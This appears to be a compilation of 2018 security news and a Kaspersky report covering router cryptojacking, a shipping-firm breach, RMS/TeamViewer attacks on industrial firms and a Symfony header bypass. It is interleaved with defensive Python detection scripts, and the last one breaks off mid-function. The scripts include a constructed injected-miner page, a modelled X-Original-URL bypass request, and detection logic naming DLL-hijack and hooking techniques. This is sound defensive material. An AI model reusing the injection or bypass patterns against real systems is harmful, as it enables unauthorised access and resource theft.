Initially, users would encounter the CoinHive script on every visited page, likely because the attacker, who appears to have high understanding of how the MikroTik routers work, might have built code to inject the script in every page.
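The injected error page is what a defender can actually observe from the network side. As an added example (not Trustwave's tooling or code from the article), the following Python snippet scans HTTP bodies captured at a proxy for the in-browser miner loader, extracts the site-key, and groups the serving routers by that key; a shared site-key across many unrelated routers is exactly the clue that pointed to a single actor here. The site-key, router addresses and page bodies are constructed placeholders.

```python
import re
from collections import defaultdict

# Signatures for the injected snippet: a loader for coinhive.min.js and the
# CoinHive.Anonymous(<site-key>) call that starts mining in the browser.
LOADER_RE = re.compile(r'''<script[^>]*\bsrc=['"][^'"]*coinhive\.min\.js['"]''', re.I)
SITEKEY_RE = re.compile(r'''CoinHive\.Anonymous\(\s*['"]([A-Za-z0-9_-]{16,})['"]''', re.I)


def find_miner_sitekey(html):
    """Return the site-key served by an HTML body, or None when no miner loader is present."""
    if not LOADER_RE.search(html):
        return None
    match = SITEKEY_RE.search(html)
    return match.group(1) if match else "<loader without site-key>"


def cluster_by_sitekey(captures):
    """Group (router_ip, html_body) captures by the site-key they inject.

    Returns {site_key: [router_ip, ...]}; routers serving clean pages are omitted.
    """
    clusters = defaultdict(set)
    for router_ip, html in captures:
        key = find_miner_sitekey(html)
        if key is not None:
            clusters[key].add(router_ip)
    return {key: sorted(ips) for key, ips in clusters.items()}


# Constructed samples: a clean 404 page and the same page with the miner injected,
# served from TEST-NET addresses with a placeholder site-key.
CONSTRUCTED_KEY = "CONSTRUCTEDSITEKEY00000000000000"
CLEAN_PAGE = "<html><body><h1>404 Not Found</h1></body></html>"
INJECTED_PAGE = (
    "<html><head>"
    "<script src='https://coinhive.com/lib/coinhive.min.js'></script>"
    "<script>var miner = new CoinHive.Anonymous('" + CONSTRUCTED_KEY + "');miner.start();</script>"
    "</head><body><h1>404 Not Found</h1></body></html>"
)
SAMPLE_CAPTURES = [
    ("198.51.100.10", INJECTED_PAGE),
    ("198.51.100.11", INJECTED_PAGE),
    ("198.51.100.12", CLEAN_PAGE),
]

if __name__ == "__main__":
    for key, routers in cluster_by_sitekey(SAMPLE_CAPTURES).items():
        print(f"site-key {key} served by {len(routers)} router(s): {', '.join(routers)}")
```

The string match on the loader URL is a signature, so it only catches this family of injection; a more general check compares each router's error page against a known-good baseline, since any unexpected script in a router-served error page is a finding regardless of which miner it loads.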

In addition to modifying the device’s settings to serve the crypto-mining error page, the attacker also created a backdoor on the compromised devices. Kenin also noticed that the script has been updated several times during his investigation.

“The attacker seems to be adding more cleanup commands to leave a smaller footprint and reduce risk of being detected,” the researcher notes.

Kenin also noticed that, although the attack was initially focused on Brazil, MikroTik devices in other countries started being infected as well. In fact, he eventually discovered that over 170,000 routers globally appeared to have the CoinHive site-key.

By targeting MikroTik’s vulnerable carrier-grade router devices, the attackers ensured a broad reach: impacted are not only users behind the routers, but also the visitors of any website hosted behind such a router.

“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily,” Kenin points out.

While the routers were exploited to deliver a crypto-mining payload, the devices could have been exploited for other objectives, Sean Newman, Director of Product Management at Corero Network Security, told SecurityWeek. "From a DDoS perspective, the scale of processing power available in such devices could easily be leveraged for a single attack which could extend to tens of terabits per second, or many smaller attacks if they were used as part of a DDoS for hire service," Newman said.

Global Shipping Firm Clarksons Provides Update on 2017 Breach
3.8.2018 securityweek  Incident

Clarkson PLC (Clarksons), a global shipping services firm, this week provided an update to the breach it suffered between May and November 2017. Little further on the nature of the breach is revealed, other than the extent of the customer personal information that was stolen.

In November 2017, Clarksons revealed that a single compromised user account had allowed attackers to infiltrate their systems, exfiltrate personal data, and demand a ransom for its safe return. Clarksons declined to pay the ransom, and for some time it was expected that the data might be revealed. "I hope our clients understand that we would not be held to ransom by criminals, and I would like to sincerely apologise for any concern this incident may have understandably raised," said Andi Case, CEO of Clarksons.

In its latest statement (PDF) the firm claims it was able -- with the help of law enforcement and forensic specialists -- to successfully trace and recover the stolen data. It doesn't state -- and probably could not know -- whether the stolen data had been copied before it was recovered. It is nevertheless warning those potentially affected by the incident to, "Remain vigilant against incidents of identity theft and fraud by reviewing personal account statements for suspicious activity and to detect errors."

What is most surprising in this updated information is the extent of personal information that was stored by the company and stolen by the criminals. In full, the statement says,

"While the potentially affected personal information varies by individual, this data may include a date of birth, contact information, criminal conviction information, ethnicity, medical information, religion, login information, signature, tax information, insurance information, informal reference, national insurance number, passport information, social security number, visa/travel information, CV / resume, driver's license/vehicle identification information, seafarer information, bank account information, payment card information, financial information, address information and/or information concerning minors."

There is no mention of whether any of this data was encrypted or hashed. Identity theft, bank fraud and blackmail are the most obvious threats if such data were in the wrong hands.

"In this particular incident, what is honestly shocking is the amount of sensitive data that this single account had access to and I am sure the EU GDPR will be looking closely," comments Joseph Carson, chief security scientist at Thycotic. "If it is found that EU GDPR applies, and Clarkson PLC had failed to apply adequate security, they could be facing a huge financial penalty." Whether GDPR can be invoked will be up to the individual EU regulators. Clarksons claims the intruder had access to its systems from May 31, 2017 until November 4, 2017; which is before GDPR became active on May 25, 2018.

Rishi Bhargava, co-founder at Demisto, told SecurityWeek that Clarksons appears to have gone through the mechanics of breach notification conscientiously. "Clarksons seems to have provided updates and apprised affected individuals in a comprehensive and transparent manner," he said. "There are numerous cross-industry regulations to deal with while implementing breach notifications, and the granularity of US state-specific information shared by Clarksons is testament to that."

But he added, "The bigger question to consider is whether Clarksons needed to retain all this personal information in the first place. With GDPR introducing strict regulations for data processing, data consent, explicit need for processing, retention timelines, and deletion, organizations need to rethink their entire ‘data supply chain' if they haven't already. However transparent breach notifications are, they're still a post-breach exercise and need to be matched by operational data discipline in order to truly bring accountability to data processors."

It is possible that the tracing and recovery of the stolen data also implies knowledge of the perpetrator -- he or she may even be in custody. If this is true, it will probably be only through subsequent court documents that we discover exactly how the breach occurred. However, most security experts believe our knowledge so far points to a failure to use multi-factor authentication, and a failure to adequately manage privileged accounts.

Timur Kovalev, CTO at Untangle, told SecurityWeek, "While unfortunate, these sorts of breaches are certainly not uncommon. However, there are steps that organizations can take to mitigate their risk. Requiring multi-factor authentication for user accounts is a rational first step. Additionally, IT departments need to limit access of even properly credentialed users to only those apps and systems that are critical for that person's business use. Finally, companies can reduce the amount of customer data they are storing anywhere on networked systems; GDPR will certainly help accelerate this best practice."

Carson agrees. "The lesson to be learned from this incident is the importance in protecting accounts with privileged access to sensitive data and that those accounts should never use a password as the only security control. Similarly, a single account should never have full access to such a large amount of data -- at least without peer reviews and approval processes."

The question of whether Clarksons had a valid reason to store that amount of highly sensitive personal data remains one for the regulators.

Google Offers G Suite Alerts for State-Sponsored Attacks
3.8.2018 securityweek  Attack

Google this week announced that it can now alert G Suite admins when it believes users have been targeted by government-backed attackers.

The search company has been notifying users on what it believes might be state-sponsored attacks for over six years, and reaffirmed its commitment to continue alerting users on such incidents last year.

The Internet giant is now providing G Suite admins with the option to receive alerts whenever attacks appearing to be coming from a state-sponsored actor are targeting their users. The feature will show up in the G Suite Admin console as soon as it becomes available.

“If an admin chooses to turn the feature on, an email alert (to admins) is triggered when we believe a government-backed attacker has likely attempted to access a user’s account or computer through phishing, malware, or another method,” Google explains.

As usual, such alerts don’t necessarily imply that the account has been compromised or that the organization has been hit with a larger attack.

The new feature is turned off by default, but admins can easily enable or disable it in Admin Console > Reports > Manage Alerts > Government backed attack.

The feature also allows admins to set who is being notified when such attacks are detected (by default, super admins receive the notification via email).

Once an attack has been detected, admins can choose to secure the account suspected to have been targeted, and can also opt to alert the user on both the attack and the security measures taken.

The feature is set to gradually roll out to all G Suite editions and should be available for all admins within the next 15 days, Google said.

Companies such as Microsoft, Facebook, and Twitter are also warning users when detecting attacks believed to have been performed by a government-backed actor.

Industrial Sector targeted in surgical spear-phishing attacks
3.8.2018 securityaffairs 

The industrial sector was hit by a surgical spear-phishing campaign aimed at installing legitimate remote administration software on victims’ machines.
Attackers carried out a spear-phishing campaign against entities in the industrial sector; the messages, disguised as commercial offers, were used to deliver legitimate remote administration software (TeamViewer or Remote Manipulator System/Remote Utilities (RMS)) to victims’ systems.

Attackers personalized the content of each phishing email to reflect the activity of the target organization and the type of work performed by the employee to whom the email was sent.

The campaign was discovered by experts from Kaspersky Lab, who believe the attackers are financially motivated.

“Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.” reads the blog post published by Kaspersky.

“According to the data available, the attackers’ main goal is to steal money from victim organizations’ accounts.”

Once the attackers have gained access to the victim’s system, they search for purchase documents as well as the financial and accounting software in use. The crooks then look for ways to monetize their effort, for example by spoofing the bank details used to make payments.

According to Kaspersky, a spike in spear-phishing messages in November 2017 targeted up to 400 industrial companies located in Russia.


The spear-phishing campaign is still ongoing; the messages purport to be invitations to tender from large industrial companies.

The quality of the phishing messages suggests the attackers spent significant effort in the reconnaissance phase.

“It is worth noting that the attackers addressed an employee of the company under attack by his or her full name,” state the researchers. “This indicates that the attack was carefully prepared and an individual email that included details relevant to the specific organization was created for each victim.”

The attackers used both malicious attachments and links to external resources from which the malicious code is downloaded.

“Malicious files can be run either by an executable file attached to an email or by a specially crafted script for the Windows command interpreter.” state the researchers.

“For example, the archive mentioned above contains an executable file, which has the same name and is a password-protected self-extracting archive. The archive extracts the files and runs a script that installs and launches the actual malware in the system.”

Regarding the legitimate software used by the attackers, TeamViewer or Remote Manipulator System/Remote Utilities (RMS): in both cases the attackers performed a DLL hijacking attack, substituting a malicious library for a system DLL so that their code is loaded directly into the process.

The malicious library takes the place of the system file winspool.drv, which is located in the system folder and is used to send documents to the printer.

The malicious winspool.drv decrypts the attackers’ configuration files, which include software settings and the password for remotely controlling the target machine.

In the case of RMS, one of the configuration files includes the email address the attacker uses to receive information about the infected system (computer name, username and the RMS machine’s internet ID).

When the attackers use TeamViewer to exfiltrate system information, a file in the malicious library contains various parameters, including the password used for remotely controlling the system and the URL of the attackers’ command-and-control server.

Unlike RMS, TeamViewer also uses a built-in VPN to remotely control a computer located behind NAT.

“After launching, the malicious library checks whether an internet connection is available by executing the command “ping” and then decrypts the malicious program’s configuration file tvr.cfg. The file contains various parameters, such as the password used for remotely controlling the system, URL of the attackers’ command-and-control server, parameters of the service under whose name TeamViewer will be installed, the User-Agent field of the HTTP header used in requests sent to the command-and-control server, VPN parameters for TeamViewer, etc.” continues the analysis.

“Unlike RMS, Team Viewer uses a built-in VPN to remotely control a computer located behind NAT.”

Kaspersky highlighted that the industrial sector is becoming a privileged target for crooks, who are able to make a profit even using simple techniques and known malware.

The use of legitimate remote administration software allows crooks to gain full control of compromised systems while avoiding detection.

“This choice on the part of the cybercriminals could be explained by the fact that the threat-awareness and cybersecurity culture in industrial companies is inferior to that in companies from other sectors of the economy (such as banks or IT companies),” Kaspersky concludes.

CVE-2018-14773 Symfony flaw exposes Drupal websites to hacking
3.8.2018 securityaffairs 

A vulnerability in the Symfony HttpFoundation component, tracked as CVE-2018-14773, could be exploited by attackers to take full control of affected Drupal websites.
Drupal maintainers addressed the security bypass vulnerability by releasing a new version of the popular content management system, version 8.5.6.

“The Drupal project uses the Symfony library. The Symfony library has released a security update that impacts Drupal. Refer to the Symfony security advisory for the issue. The same vulnerability also exists in the Zend Feed and Diactoros libraries included in Drupal core; however, Drupal core does not use the vulnerable functionality.” reads the advisory published by Drupal.

“If your site or module uses Zend Feed or Diactoros directly, read the Zend Framework security advisory and update or patch as needed.”

The Symfony HttpFoundation component is a third-party library used in Drupal core; the flaw affects Drupal 8.x versions before 8.5.6.

Symfony is a web application framework used by a large number of projects, which means the CVE-2018-14773 vulnerability could potentially affect a large number of web applications.

The flaw is due to Symfony’s support for legacy and risky HTTP headers.

“Support for a (legacy) IIS header that lets users override the path in the request URL via the X-Original-URL or X-Rewrite-URL HTTP request header allows a user to access one URL but have Symfony return a different one which can bypass restrictions on higher level caches and web servers.” reads the security advisory published by Symfony.

“The fix drops support for these two obsolete IIS headers: X-Original-URL and X_REWRITE_URL.” reads the security advisory published by Symfony.

A remote attacker can trigger the flaw by supplying a specially crafted ‘X-Original-URL’ or ‘X-Rewrite-URL’ HTTP header value.
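To make the bypass the advisory describes concrete, here is an added Python model of the path resolution before and after the fix. It is not Symfony's code; it assumes a front layer (cache or web server) that restricts /admin by looking only at the request line, which is the situation the advisory warns about, and it adds the header-stripping step a reverse proxy can apply as defence in depth. The request paths and header values are constructed.

```python
from urllib.parse import urlsplit

# Header names that Symfony HttpFoundation honoured before the CVE-2018-14773 fix.
LEGACY_PATH_OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def _lowered(headers):
    """HTTP header names are case-insensitive, so compare them lower-cased."""
    return {name.lower(): value for name, value in headers.items()}


def resolve_path_vulnerable(request_path, headers):
    """Pre-fix behaviour: a legacy IIS override header replaces the request-line path."""
    lowered = _lowered(headers)
    for name in LEGACY_PATH_OVERRIDE_HEADERS:
        if lowered.get(name):
            return urlsplit(lowered[name]).path
    return request_path


def resolve_path_fixed(request_path, headers):
    """Post-fix behaviour: the override headers are ignored and the request line decides."""
    return request_path


def front_layer_allows(request_path):
    """A cache/web-server rule that blocks /admin by inspecting only the request line (assumed)."""
    return not request_path.startswith("/admin")


def handle(request_path, headers, resolver):
    """Return (status, routed_path): 403 if the front layer blocks, else the path the app routes to."""
    if not front_layer_allows(request_path):
        return 403, None
    return 200, resolver(request_path, headers)


def strip_override_headers(headers):
    """Defence in depth at a reverse proxy: drop the legacy headers before forwarding."""
    return {n: v for n, v in headers.items() if n.lower() not in LEGACY_PATH_OVERRIDE_HEADERS}


# Constructed requests: one the front layer blocks outright, and one whose request
# line is allowed but which carries an override header pointing at the restricted path.
DIRECT_ADMIN = ("/admin/users", {})
OVERRIDE_REQUEST = ("/public/index", {"X-Original-URL": "/admin/users"})

if __name__ == "__main__":
    for label, resolver in (("vulnerable", resolve_path_vulnerable), ("fixed", resolve_path_fixed)):
        print(label, handle(*DIRECT_ADMIN, resolver), handle(*OVERRIDE_REQUEST, resolver))
```

The model shows why the front layer's decision and the application's routing must agree on the same path: with the pre-fix resolver, a request the front layer approved is routed somewhere it never inspected. Stripping the two headers at the proxy gives the same result as the patched resolver, which is useful while an upgrade is pending.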

According to the security advisory published by Symfony, versions 2.7.49, 2.8.44, 3.3.18, 3.4.14, 4.0.14, and 4.1.3 address the flaw.


The Drupal maintainers also found a similar issue affecting the Zend Feed and Diactoros libraries used in Drupal core. The libraries are affected by a ‘URL rewrite vulnerability,’ though the Drupal team confirmed that Drupal core does not use the vulnerable functionality.

Administrators of websites that use Zend Feed or Diactoros directly need to patch them as soon as possible.

Drupal administrators need to patch their installations urgently, before hackers start exploiting the CVE-2018-14773 flaw.

Google introduced G Suite alerts for state-sponsored attacks
3.8.2018 securityaffairs  Attack

Google announced that it has implemented an alerting system that notifies G Suite admins when users have been targeted by state-sponsored attacks.
Google will alert G Suite admins when state-sponsored hackers target their users.

The new feature will be available in the G Suite Admin console very soon; it confirms the effort the tech giant is putting into protecting its users.

“We’re adding a feature in the Admin console that can alert admins if we believe a user’s account has been targeted by a government-backed attack. If an admin chooses to turn the feature on, an email alert (to admins) is triggered when we believe a government-backed attacker has likely attempted to access a user’s account or computer through phishing, malware, or another method.” reads the security advisory published by Google.

“It does not necessarily mean that the account has been compromised or that there was a widespread attack on an organization.”

In June 2012, for the first time, the company announced it was going to offer a specific protection service for a restricted number of users who could be targets of state-sponsored attacks.

Google is now implementing the new protection feature within the G Suite Admin console; admins will have the option to receive alerts whenever attacks could be attributed to a nation-state actor.

Every time an attack is detected, admins can choose to secure the account hit by the hackers and can also opt to alert the victim.

The alerts don’t necessarily imply that the account has been hacked or that the organization has been compromised in a massive attack.


Google pointed out that the alerts will be turned off by default; admins can turn them on in the Admin Console > Reports > Manage Alerts > Government backed attack.

According to Google, the new feature will gradually roll out to all G Suite editions; the tech giant plans to make it available to all admins within the next 15 days.

Attacks on industrial enterprises using RMS and TeamViewer
3.8.2018 Kaspersky Attack

Main facts
Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.

The phishing emails are disguised as legitimate commercial offers and are sent mainly to industrial companies located in Russia. The content of each email reflects the activity of the organization under attack and the type of work performed by the employee to whom the email is sent.

According to the data that we have collected, this series of attacks started in November 2017 and is currently in progress. Notably, the first similar attacks were recorded as far back as 2015.

The malware used in these attacks installs legitimate remote administration software – TeamViewer or Remote Manipulator System/Remote Utilities (RMS). This enables the attackers to gain remote control of infected systems. The threat actor uses various techniques to mask the infection and the activity of malware installed in the system.

According to the data available, the attackers’ main goal is to steal money from victim organizations’ accounts. When attackers connect to a victim’s computer, they search for and analyze purchase documents, as well as the financial and accounting software used. After that, the attackers look for various ways in which they can commit financial fraud, such as spoofing the bank details used to make payments.

In cases where the cybercriminals need additional data or capabilities after infecting a system, such as privilege escalation and obtaining local administrator privileges, the theft of user authentication data for financial software and services, or Windows accounts for lateral movement, the attackers download an additional pack of malware to the system, which is specifically tailored to the attack on each individual victim. The malware pack can include spyware, additional remote administration utilities that extend the attackers’ control on infected systems, malware for exploiting operating system and application software vulnerabilities, as well as the Mimikatz utility, which provides the attackers with Windows account data.

Apparently, among other methods, the attackers obtain the information they need to perpetrate their criminal activity by analyzing the correspondence of employees at the enterprises attacked. They may also use the information found in these emails to prepare new attacks – against companies that partner with the current victim.

Clearly, on top of the financial losses, these attacks result in leaks of the victim organizations’ sensitive data.

Phishing emails
In most cases, the phishing emails have finance-related content; the names of attachments also point to their connection with finance. Specifically, some of the emails purport to be invitations to tender from large industrial companies (see below).

Malicious attachments may be packed into archives. Some of the emails have no attachments – in these cases, message text is designed to lure users into following links leading to external resources and downloading malicious objects from those resources.

Below is a sample phishing email used in attacks on some organizations:

Screenshot of a phishing email

The above email was sent on behalf of a well-known industrial organization. The domain name of the server from which the message was sent was similar to the domain name of that organization’s official website. The email had an archive attached to it. The archive was protected with a password that could be found in the message body.

It is worth noting that the attackers addressed an employee of the company under attack by his or her full name (this part of the email was masked in the screenshot above for confidentiality reasons). This indicates that the attack was carefully prepared and an individual email that included details relevant to the specific organization was created for each victim.

As part of the attacks, the threat actor uses various techniques to mask the infection. In this case, Seldon 1.7 – legitimate software designed to search for tenders – is installed in infected systems in addition to malware components and a remote administration application.

To keep users from wondering why they didn’t get information on the procurement tender referred to in the phishing email, the malicious program distributes a damaged copy of Seldon 1.7 software.

Window of legitimate software Seldon 1.7

In other cases, the user is shown a partially damaged image.

Image opened by malware

There is also a known case of malware being masked as a PDF document containing a bank transfer receipt. Curiously, the receipt contains valid data. Specifically, it mentions existing companies and their valid financial details; even a car’s VIN matches its model.

Screenshot of a bank transfer receipt displayed by malware

The malware used in these attacks installs legitimate remote administration software – TeamViewer or Remote Manipulator System/Remote Utilities (RMS).

Attacks using RMS
There are several known ways in which the malware can be installed in a system. Malicious files can be run either by an executable file attached to an email or by a specially crafted script for the Windows command interpreter.

For example, the archive mentioned above contains an executable file, which has the same name and is a password-protected self-extracting archive. The archive extracts the files and runs a script that installs and launches the actual malware in the system.

Contents of the malware installation file

It can be seen from the commands in the screenshot above that after copying the files the script deletes its own file and launches legitimate software in the system (Seldon v.1.7 and RMS), enabling the attackers to control the infected system without the user’s knowledge.

Depending on the malware version, files are installed in the %AppData%\LocalDataNT, %AppData%\NTLocalData or %AppData%\NTLocalAppData folder.

When it launches, legitimate RMS software loads dynamic libraries (DLL) required for the program’s operation, including the system file winspool.drv, which is located in the system folder and is used to send documents to the printer. RMS loads the library insecurely, using its relative path (the vendor has been notified of this vulnerability). This enables the attackers to conduct a DLL hijacking attack: they place a malicious library in the same directory as the RMS executable file, as a result of which a malware component loads and gains control instead of the corresponding system library.

The malicious library completes malware installation. Specifically, it creates a registry value responsible for automatically running RMS at system startup. Notably, in most cases of this campaign the registry value is placed in the RunOnce key, instead of the Run key, enabling the malware to run automatically only the next time the system starts up. After that, the malware needs to create the registry value again.

It is most likely that the attackers chose this approach to mask the presence of malware in the system as well as possible. The malicious library also implements techniques for resisting analysis and detection. One such technique involves dynamically importing Windows API functions using their hashes. This way, the attackers do not have to store the names of these functions in the malicious library’s body, which helps them to conceal the program’s real functionality from most analysis tools.

Part of a malicious code fragment implementing the dynamic import of functions
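The analyst-side counterpart of the import-by-hash technique just described is a reverse lookup table: hash every export of the DLLs a sample is likely to use, then look up the constants found in the sample. The script below is an added illustration, not code from the report or from the malware; the report does not say which hash routine the sample uses, so the rotate-right-13 accumulate is an assumption to be replaced by whatever is recovered from the sample, and the export list and byte blob are constructed.

```python
"""Added example (not from the report): a reverse lookup table for API-name hashes.
The hash routine (ROR13) and the export list are assumptions; a real run would
take the routine from the sample and the names from the DLLs' export tables."""
import struct


def ror13_hash(name: str) -> int:
    """32-bit rotate-right-13-then-add over the ASCII bytes of a name (assumed)."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


# Constructed export list; a real run would read the export tables of the DLLs
# on an analysis machine (kernel32.dll, user32.dll, advapi32.dll, ...).
KNOWN_EXPORTS = {
    "kernel32.dll": ["LoadLibraryA", "GetProcAddress", "CreateFileW", "WriteFile",
                     "VirtualAlloc", "CreateProcessW"],
    "user32.dll": ["ShowWindow", "FindWindowW", "SetWindowsHookExW"],
    "advapi32.dll": ["RegSetValueExW", "RegCreateKeyExW"],
}


def build_hash_table(exports=KNOWN_EXPORTS, hash_fn=ror13_hash):
    """Map hash -> ['dll!Name', ...]; a list because different names may collide."""
    table = {}
    for dll, names in exports.items():
        for name in names:
            table.setdefault(hash_fn(name), []).append(f"{dll}!{name}")
    return table


def scan_for_hashes(blob: bytes, table):
    """Try every byte offset as a little-endian dword and report the ones that
    resolve against the table. Returns {offset: [names]}."""
    hits = {}
    for off in range(len(blob) - 3):
        value = struct.unpack_from("<I", blob, off)[0]
        if value in table:
            hits[off] = table[value]
    return hits


# Constructed stand-in for a code/data region: two hash constants among filler bytes.
SAMPLE_BLOB = (b"\x90\x90"
               + struct.pack("<I", ror13_hash("LoadLibraryA"))
               + b"\xCC"
               + struct.pack("<I", ror13_hash("ShowWindow"))
               + b"\x00" * 4)

if __name__ == "__main__":
    for off, names in sorted(scan_for_hashes(SAMPLE_BLOB, build_hash_table()).items()):
        print(f"offset {off:#x}: {', '.join(names)}")
```

Scanning at every byte offset rather than only aligned dwords matters because such constants are usually embedded as immediate operands inside instructions, not in aligned tables; with a 32-bit hash and a few thousand names, accidental matches are rare enough to review by hand.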

The malicious dynamic library, winspool.drv, decrypts configuration files prepared by the attackers, which contain RMS software settings, the password for remotely controlling the machine and the settings needed to notify the attackers that the system has been successfully infected.

One of the configuration files contains an email address to which information about the infected system is sent, including computer name, user name, the RMS machine’s Internet ID, etc. The Internet ID sent as part of this information is generated on a legitimate server of the RMS vendor after the computer connects to it. The identifier is subsequently used to connect to the remotely controlled system located behind NAT (a similar mechanism is also used in popular instant messaging solutions).

A list of email addresses found in the configuration files discovered is provided in the indicators of compromise section.

A modified version of RC4 is used to encrypt configuration files. Configuration files from the archive mentioned above are shown below.

Decrypted contents of InternetId.rcfg file

Decrypted contents of notification.rcfg file

Decrypted contents of Options.rcfg file

Decrypted contents of Password.rcfg file

After this, the attackers can use the system’s Internet ID and password to control it without the user’s knowledge via a legitimate RMS server, using the standard RMS client.

Attacks using TeamViewer
Attacks using legitimate TeamViewer software are very similar to those using RMS software, which are described above. A distinguishing feature is that information from infected systems is sent to malware command-and-control servers, rather than the attackers’ email address.

As in the case of RMS, malicious code is injected into the TeamViewer process by substituting a malicious library for system DLL. In the case of TeamViewer, msimg32.dll is used.

This is not a unique tactic. Legitimate TeamViewer software has been used in APT and cybercriminal attacks before. The best-known group to have used this toolset is TeamSpy Crew. We believe that the attacks described in this document are not associated with TeamSpy and are the result of known malware being re-used by another cybercriminal group. Curiously, the algorithm used to encrypt the configuration file and the password for decrypting it, which were identified in the process of analyzing these attacks, are the same as those published last April in a description of similar attacks.

It is common knowledge that legitimate TeamViewer software does not hide its startup or operation from the user and, specifically, notifies the user of incoming connections. At the same time, the attackers need to gain remote control of the infected system without the user’s knowledge. To achieve this, they hook several Windows API functions.

The functions are hooked using a well-known method called splicing. As a result, when legitimate software calls one of the Windows API functions, control is passed to the malicious DLL and the legitimate software gets a spoofed response instead of one from the operating system.

Windows API function hooked by the malware

Hooking Windows API functions enables attackers to hide TeamViewer windows, protect malware files from being detected, and control TeamViewer startup parameters.
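A splice of the kind described above overwrites the first instructions of the target function inside the process, so the hook can be found by comparing those bytes with the same function's entry in the on-disk image. The check below is an added example and not code from the report; the prologue bytes, the jump displacement and the function names are constructed, and in real tooling the two byte strings would come from reading the live process and parsing the DLL's PE image respectively.

```python
"""Added example (not from the report): an integrity check for a 'splicing' hook,
comparing the first bytes of an API function in a live process with the bytes of
the same function in the on-disk image. All byte strings here are constructed."""
import struct

# Typical hot-patchable x86 prologue: mov edi,edi; push ebp; mov ebp,esp
CLEAN_PROLOGUE = b"\x8B\xFF\x55\x8B\xEC"
# The same entry after a 5-byte trampoline was written over it: jmp +0x1000
HOOKED_PROLOGUE = b"\xE9" + struct.pack("<i", 0x1000)


def classify_trampoline(entry: bytes):
    """Recognise the encodings a splice normally uses at a function entry.
    Returns (kind, target) or None; target is an offset from the function start
    for relative jumps and the raw operand for the other forms."""
    if len(entry) >= 5 and entry[0] == 0xE9:                       # JMP rel32
        return "jmp rel32", struct.unpack_from("<i", entry, 1)[0] + 5
    if len(entry) >= 6 and entry[:2] == b"\xFF\x25":               # JMP [disp32] / JMP [rip+disp32]
        return "jmp indirect", struct.unpack_from("<I", entry, 2)[0]
    if len(entry) >= 6 and entry[0] == 0x68 and entry[5] == 0xC3:  # PUSH imm32; RET
        return "push/ret", struct.unpack_from("<I", entry, 1)[0]
    return None


def check_entry(function: str, on_disk: bytes, in_memory: bytes) -> dict:
    """Compare prologue bytes and describe any patch found."""
    n = min(len(on_disk), len(in_memory))
    if on_disk[:n] == in_memory[:n]:
        return {"function": function, "hooked": False}
    found = classify_trampoline(in_memory)
    return {
        "function": function,
        "hooked": True,
        "kind": found[0] if found else "unknown patch",
        "target": found[1] if found else None,
    }


def audit(functions) -> list:
    """functions: {name: (on_disk_bytes, in_memory_bytes)} -> hooked entries only."""
    return [r for r in (check_entry(f, d, m) for f, (d, m) in functions.items()) if r["hooked"]]


# Constructed view of three user32 exports (the report does not list which
# functions the malware hooks): one spliced, one clean, one patched with NOPs.
SAMPLE = {
    "user32!ShowWindow": (CLEAN_PROLOGUE, HOOKED_PROLOGUE),
    "user32!FindWindowW": (CLEAN_PROLOGUE, CLEAN_PROLOGUE),
    "user32!SetWindowTextW": (CLEAN_PROLOGUE, b"\x90" * 5),
}

if __name__ == "__main__":
    for r in audit(SAMPLE):
        print(f"{r['function']}: {r['kind']} (target {r['target']})")
```

Comparing against the on-disk image rather than a hard-coded prologue keeps the check valid across Windows builds; note that relocated absolute operands and legitimate products (endpoint security agents also splice) produce differences, so a hit is a lead to be correlated with the owning module, not a verdict.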

After launching, the malicious library checks whether an internet connection is available by executing the command “ping” and then decrypts the malicious program’s configuration file tvr.cfg. The file contains various parameters, such as the password used for remotely controlling the system, URL of the attackers’ command-and-control server, parameters of the service under whose name TeamViewer will be installed, the User-Agent field of the HTTP header used in requests sent to the command-and-control server, VPN parameters for TeamViewer, etc.

Screenshot of decrypted contents of the malware configuration file

Unlike RMS, TeamViewer uses a built-in VPN to remotely control a computer located behind NAT.

As in the case of RMS, the relevant value is added to the RunOnce registry key to ensure that the malware runs automatically at system startup.
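Both the RMS and the TeamViewer variants leave the same two traces on a host: a system DLL name (winspool.drv or msimg32.dll) sitting beside a legitimate executable outside the system directory, and a RunOnce value that relaunches that executable from a profile folder. The review script below is an added example, not code from the report or from either vendor; the file inventory and autorun entries are constructed, the executable name remote_admin.exe is a placeholder, and cryptbase.dll is included because the report describes the same hijack against migwiz.exe later on.

```python
"""Added example (not from the report, RMS or TeamViewer): reviewing a host file
inventory and its autorun entries for the DLL-hijack and RunOnce patterns the
report describes. All inputs are constructed; in practice they would come from a
file listing and an export of the Run/RunOnce keys of each hive."""
import ntpath
from typing import Iterable

# System DLL names the report says were planted beside RMS (winspool.drv),
# TeamViewer (msimg32.dll) and migwiz.exe (cryptbase.dll).
SHADOWED_SYSTEM_DLLS = {"winspool.drv", "msimg32.dll", "cryptbase.dll"}

# Where those libraries legitimately live (assumption: default Windows layout).
LEGIT_DLL_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Install folder names the report lists under %AppData%.
REPORTED_INSTALL_DIRS = {"localdatant", "ntlocaldata", "ntlocalappdata"}


def find_shadow_dlls(paths: Iterable[str]) -> list:
    """Paths whose file name is a shadowed system DLL but whose directory is not
    a system directory: candidates for the search-order hijack described above."""
    hits = []
    for p in paths:
        directory, name = ntpath.split(p)
        if name.lower() in SHADOWED_SYSTEM_DLLS and directory.lower() not in LEGIT_DLL_DIRS:
            hits.append(p)
    return hits


def _executable_of(command: str) -> str:
    """First token of an autorun command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def flag_autoruns(autoruns, shadow_dll_paths) -> list:
    """autoruns: iterable of (registry_key, value_name, command).
    Returns (key, value_name, reasons) for entries matching the report's pattern."""
    shadow_dirs = {ntpath.dirname(p).lower() for p in shadow_dll_paths}
    findings = []
    for key, value_name, command in autoruns:
        exe_dir = ntpath.dirname(_executable_of(command)).lower()
        reasons = []
        if key.lower().endswith("\\runonce") and "\\appdata\\" in exe_dir + "\\":
            reasons.append("RunOnce value relaunching a program from the user profile")
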